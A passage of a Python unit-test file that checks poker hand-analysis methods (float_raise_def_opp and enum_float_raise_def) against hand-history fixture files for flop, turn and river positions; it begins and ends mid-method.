        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(True, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr3r__F__XBFC__T__XX__R__BRF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        strt, plr = 'flop', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(True, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr3r__F__XBFC__T__XX__R__XBRC.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        strt, plr = 'flop', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr3r__F__XBFC__T__XX__R__BF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        strt, plr = 'flop', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr3r__F__XBFC__T__XX__R__XBF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        strt, plr = 'flop', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr3r__F__XBCF__T__XX__R__XBF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        strt, plr = 'flop', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr3r__F__XBCF__T__XX__R__XBRC.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        strt, plr = 'flop', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr3r__F__XBCF__T__XX__R__XX.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        strt, plr = 'flop', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr2r__F__XBC__T__XX__R__XBC.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        strt, plr = 'flop', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr2r__F__XBC__T__XX__R__BRC.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        strt, plr = 'flop', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(True, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr2r__F__XBC__T__XBC__R__XX.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        strt, plr = 'flop', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
    def test_enum_float_raise_def(self):
        # folder with the correct answers
        folder = f + '/testy/rece/'
        file = 'in0gr2r__F__BC__T__XX.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        strt, plr = 'flop', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        file = 'in0gr2r__F__BC__T__XBC.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        strt, plr = 'flop', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        file = 'in1gr2r__F__BC__T__XBC.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        strt, plr = 'flop', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        file = 'in1gr2r__F__BC__T__XX.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        strt, plr = 'flop', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        file = 'in1gr2r__F__BC__T__BRC.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        strt, plr = 'flop', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        file = 'in1gr2r__F__BC__T__BF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        strt, plr = 'flop', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        file = 'in1gr3r__F__BCC__T__XXX.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        strt, plr = 'flop', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        file = 'in1gr3r__F__BCC__T__XXBFC.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        strt, plr = 'flop', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        file = 'in1gr3r__F__BCF__T__XX.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        strt, plr = 'flop', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        file = 'in1gr3r__F__BCF__T__XBC.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        strt, plr = 'flop', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr3r__F__BCF__T__XX.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        strt, plr = 'flop', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr3r__F__BCF__T__XBRF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        strt, plr = 'flop', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr3r__F__XBCC__T__XXX.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        strt, plr = 'flop', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr3r__F__XBCF__T__XX.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        strt, plr = 'flop', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr3r__F__XBCF__T__XBF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        strt, plr = 'flop', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr3r__F__XBCF__T__XBRC.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        strt, plr = 'flop', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual('call 2bet', tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr3r__F__XBFC__T__XX__R__BRF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        strt, plr = 'flop', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual('fold', tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr3r__F__XBFC__T__XX__R__XBRC.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        strt, plr = 'flop', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'sf'
